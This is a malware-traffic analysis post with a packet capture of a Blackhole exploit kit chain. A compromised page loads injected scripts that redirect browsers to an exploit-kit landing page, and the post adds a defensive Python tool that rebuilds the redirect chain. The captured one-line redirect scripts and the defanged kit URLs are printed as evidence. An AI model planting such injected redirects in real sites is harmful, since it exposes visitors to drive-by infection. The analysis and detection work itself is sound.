Blackhole v2.0 Exploit Kit, Java vector: injected link and Java applet

June 19, 2015

2012-09-18 22:41:41.081678 IP 192.168.106.131.1325 > 192.168.106.2.53: 35602+ A? arksylhet[.]com. (31)
2012-09-18 22:41:41.212429 IP 192.168.106.2.53 > 192.168.106.131.1325: 35602 1/0/0 A 216.246.98.78 (47)
2012-09-18 22:41:41.214138 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [S], seq 56424381, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-09-18 22:41:41.417038 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [S.], seq 816984929, ack 56424382, win 64240, options [mss 1460], length 0
2012-09-18 22:41:41.417133 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [.], ack 1, win 64240, length 0
2012-09-18 22:41:41.418016 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 1:389, ack 1, win 64240, length 388
GET /A67iD4eo/index.html HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:41.418106 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 389, win 64240, length 0
2012-09-18 22:41:41.644235 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

[gzip-compressed HTML body, 208 bytes, not decoded in this capture]
2012-09-18 22:41:41.657446 IP 192.168.106.131.1325 > 192.168.106.2.53: 18706+ A? ankaradellservisi[.]com. (39)
2012-09-18 22:41:41.744240 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [P.], seq 1:509, ack 389, win 64240, length 508
HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:53 GMT
Server: Apache
Last-Modified: Tue, 18 Sep 2012 15:53:47 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
2012-09-18 22:41:41.752613 IP 192.168.106.131.1079 > 192.168.106.2.53: 45075+ A? web63.server77.publicompserver[.]de. (51)
2012-09-18 22:41:41.762668 IP 192.168.106.131.1076 > 192.168.106.2.53: 17427+ A? classerental[.]com. (34)
2012-09-18 22:41:41.765791 IP 192.168.106.2.53 > 192.168.106.131.1325: 18706 1/0/0 A 89.106.12.145 (55)
2012-09-18 22:41:41.766452 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [S], seq 2647479993, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-09-18 22:41:41.884803 IP 192.168.106.2.53 > 192.168.106.131.1079: 45075 1/0/0 A 92.43.108.70 (67)
2012-09-18 22:41:41.886388 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [S], seq 928996080, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-09-18 22:41:41.888357 IP 192.168.106.2.53 > 192.168.106.131.1076: 17427 1/0/0 A 174.121.152.5 (50)
2012-09-18 22:41:41.888845 IP 192.168.106.131.1412 > 174.121.152.5.80: Flags [S], seq 528402302, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-09-18 22:41:41.914944 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [S.], seq 2045726438, ack 2647479994, win 64240, options [mss 1460], length 0
2012-09-18 22:41:41.915045 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [.], ack 1, win 64240, length 0
2012-09-18 22:41:41.915330 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [P.], seq 1:383, ack 1, win 64240, length 382
GET /78gcm6uH/js.js HTTP/1.1
Host: ankaradellservisi[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:41.915419 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [.], ack 383, win 64240, length 0
2012-09-18 22:41:42.000482 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [S.], seq 1489918110, ack 928996081, win 64240, options [mss 1460], length 0
2012-09-18 22:41:42.000671 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [.], ack 1, win 64240, length 0
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver[.]de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html

2012-09-18 22:41:42.001159 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [.], ack 395, win 64240, length 0
2012-09-18 22:41:42.067301 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: "56c7ca2db295cd1:143d0e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT

document.location='hxxp://69.194.193.34/links/systems-links_warns.php';

2012-09-18 22:41:42.074803 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 389:739, ack 509, win 63732, length 350
GET /favicon.ico HTTP/1.1
Host: arksylhet[.]com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

2012-09-18 22:41:42.074927 IP 216.246.98.78.80 > 192.168.106.131.1409: Flags [.], ack 739, win 64240, length 0
2012-09-18 22:41:42.075596 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [S], seq 2894491348, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
HTTP/1.1 200 OK
Date: Wed, 19 Sep 2012 02:41:54 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 19 Sep 2012 02:31:59 GMT
ETag: "894002-47-4ca04cfa1a5c0"
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

document.location='hxxp://69.194.193.34/links/systems-links_warns.php';
2012-09-18 22:41:42.119620 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [R.], seq 396, ack 473, win 0, length 0
2012-09-18 22:41:42.121447 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
2012-09-18 22:41:42.167256 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
HTTP/1.1 200 OK
Content-Length: 71
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Sep 2012 15:27:56 GMT
Accept-Ranges: bytes
ETag: "56c7ca2db295cd1:143d0e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Sep 2012 01:39:40 GMT

document.location='hxxp://69.194.193.34/links/systems-links_warns.php';
2012-09-18 22:41:42.167362 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [.], ack 338, win 63903, length 0
2012-09-18 22:41:42.221243 IP 174.121.152.5.80 > 192.168.106.131.1412: Flags [S.], seq 415633654, ack 528402303, win 64240, options [mss 1460], length 0
2012-09-18 22:41:42.258484 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [S.], seq 1477912213, ack 2894491349, win 64240, options [mss 1460], length 0
2012-09-18 22:41:42.258663 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [.], ack 1, win 64240, length 0
2012-09-18 22:41:42.260280 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
GET /links/systems-links_warns.php HTTP/1.1
Host: 69.194.193.34
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://arksylhet[.]com/A67iD4eo/index.html
2012-09-18 22:41:43.033150 IP 69.194.193.34.80 > 192.168.106.131.1413: Flags [.], seq 1:1461, ack 450, win 64240, length 1460
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 19 Sep 2012 02:41:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.14-1~dotdeb.0

510
69.194.193.34.80: Flags [R.], seq 264, ack 1461, win 0, length 0
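
What the capture shows, step by step: the browser fetches /A67iD4eo/index.html from arksylhet[.]com, then requests js.js from two other hosts (ankaradellservisi[.]com and web63.server77.publicompserver[.]de) with index.html as Referer, so both are script includes injected into that page. Each js.js reply is a 71-byte JavaScript body consisting of a single document.location assignment, and both point at the same exploit-kit landing URL on 69.194.193.34. The browser then requests that landing page, again with index.html as Referer, because a location change made by a script carries the document's Referer, not the script host's.

The following Python script is an added example, not code from the original post. It parses tcpdump -A output of the shape shown above, pairs each HTTP request with the first reply on the same TCP connection, flags script replies whose body is a bare location assignment to another host, and rebuilds the hop graph from Referer headers plus those body-level redirects. The SAMPLE text is a constructed, condensed copy of the capture above (DNS, handshakes, byte dumps and most headers dropped); the function and field names are this example's own. Indicators are kept defanged ([.] and hxxp) as they appear on the page, and the regexes accept both defanged and live URLs.

```python
"""Added example (not from the original post): rebuild the redirect chain from
tcpdump -A records like those above. Indicators stay defanged ([.] / hxxp)."""
from __future__ import annotations
import re
from dataclasses import dataclass

TS = r"(?:\d{4}-\d{2}-\d{2} )?\d\d:\d\d:\d\d\.\d+ IP "          # start of a tcpdump record
HEADER_RE = re.compile(TS + r"(?P<src>\S+) > (?P<dst>\S+): Flags ")
REDIRECT_RE = re.compile(r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""")
URL_RE = re.compile(r"^(?:https?|hxxps?)://(?P<host>[^/'\"]+)(?P<path>/[^'\"]*)?$")  # live or defanged

# Constructed sample condensed from the capture above: DNS, handshakes, byte
# dumps and most headers dropped; four HTTP requests and the two js.js replies kept.
SAMPLE = """\
2012-09-18 22:41:41.418016 IP 192.168.106.131.1409 > 216.246.98.78.80: Flags [P.], seq 1:389, ack 1, win 64240, length 388
GET /A67iD4eo/index.html HTTP/1.1
Host: arksylhet[.]com
2012-09-18 22:41:41.915330 IP 192.168.106.131.1410 > 89.106.12.145.80: Flags [P.], seq 1:383, ack 1, win 64240, length 382
GET /78gcm6uH/js.js HTTP/1.1
Host: ankaradellservisi[.]com
Referer: http://arksylhet[.]com/A67iD4eo/index.html
2012-09-18 22:41:42.001035 IP 192.168.106.131.1411 > 92.43.108.70.80: Flags [P.], seq 1:395, ack 1, win 64240, length 394
GET /Lk1SsGQm/js.js HTTP/1.1
Host: web63.server77.publicompserver[.]de
Referer: http://arksylhet[.]com/A67iD4eo/index.html
2012-09-18 22:41:42.067301 IP 89.106.12.145.80 > 192.168.106.131.1410: Flags [P.], seq 1:338, ack 383, win 64240, length 337
HTTP/1.1 200 OK
Content-Type: application/x-javascript

document.location='hxxp://69.194.193.34/links/systems-links_warns.php';
2012-09-18 22:41:42.119368 IP 92.43.108.70.80 > 192.168.106.131.1411: Flags [P.], seq 1:473, ack 396, win 64239, length 472
HTTP/1.1 200 OK
Content-Type: application/javascript

document.location='hxxp://69.194.193.34/links/systems-links_warns.php';
2012-09-18 22:41:42.260280 IP 192.168.106.131.1413 > 69.194.193.34.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
GET /links/systems-links_warns.php HTTP/1.1
Host: 69.194.193.34
Referer: http://arksylhet[.]com/A67iD4eo/index.html
"""

@dataclass
class Exchange:
    host: str
    path: str
    referer: str | None = None
    content_type: str = ""       # empty when no reply was captured
    body: str = ""

def records(text: str):
    """Yield (header match, payload text) for each tcpdump record."""
    for chunk in re.split(f"(?m)^(?={TS})", text):
        hdr, _, payload = chunk.partition("\n")
        m = HEADER_RE.match(hdr)
        if m:
            yield m, payload

def headers(lines) -> dict[str, str]:
    return {k.strip().lower(): v.strip() for k, sep, v in (l.partition(":") for l in lines) if sep}

def parse_exchanges(text: str) -> list[Exchange]:
    """Pair each request with the first reply seen on the same TCP connection."""
    pending, out = {}, []
    for m, payload in records(text):
        parts = re.split(r"\n\s*\n", payload.strip(), maxsplit=1)
        if not parts[0]:
            continue                                   # SYN/ACK/DNS: no HTTP payload
        lines, body = parts[0].splitlines(), parts[1] if len(parts) > 1 else ""
        conn = frozenset((m["src"], m["dst"]))         # same key in both directions
        if re.match(r"(GET|POST|HEAD) ", lines[0]):
            h = headers(lines[1:])
            pending[conn] = ex = Exchange(h.get("host", m["dst"]), lines[0].split(" ", 2)[1], h.get("referer"))
            out.append(ex)
        elif lines[0].startswith("HTTP/") and conn in pending:
            ex = pending.pop(conn)
            ex.content_type = headers(lines[1:]).get("content-type", "")
            ex.body = body.strip()
    return out

def host_path(url: str) -> str:
    u = URL_RE.match(url)
    return f"{u['host']}{u['path'] or '/'}" if u else url

def js_redirects(exchanges: list[Exchange]) -> list[dict]:
    """Script replies that assign location; cross_host marks a hand-off to another host."""
    hits = []
    for ex in exchanges:
        m = REDIRECT_RE.search(ex.body) if "javascript" in ex.content_type.lower() else None
        if m:
            u = URL_RE.match(m.group(1))
            hits.append({"script": ex.host + ex.path, "target": m.group(1),
                         "cross_host": bool(u) and u["host"] != ex.host})
    return hits

def redirect_chain(exchanges: list[Exchange]) -> list[tuple[str, str, str]]:
    """Hops as (from, to, kind): Referer edges plus body-level JS redirects."""
    hops = [(host_path(ex.referer), ex.host + ex.path, "referer") for ex in exchanges if ex.referer]
    hops += [(h["script"], host_path(h["target"]), "js-redirect") for h in js_redirects(exchanges)]
    return hops
```

Running redirect_chain(parse_exchanges(SAMPLE)) yields three Referer edges, all from index.html, and two js-redirect edges from the js.js hosts to 69.194.193.34/links/systems-links_warns.php. The point of the second edge type is the Referer on the landing-page request: it names arksylhet[.]com, not the js.js host, so a timeline built from Referer headers alone would show the compromised page calling the exploit kit directly and drop the two injected intermediaries. Only the script bodies tie the hops together. The gzip-compressed index.html body is not decoded here (the page shows it only as raw bytes), so the injected script tags themselves are not extracted; a fuller tool would inflate that body and confirm the two includes.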
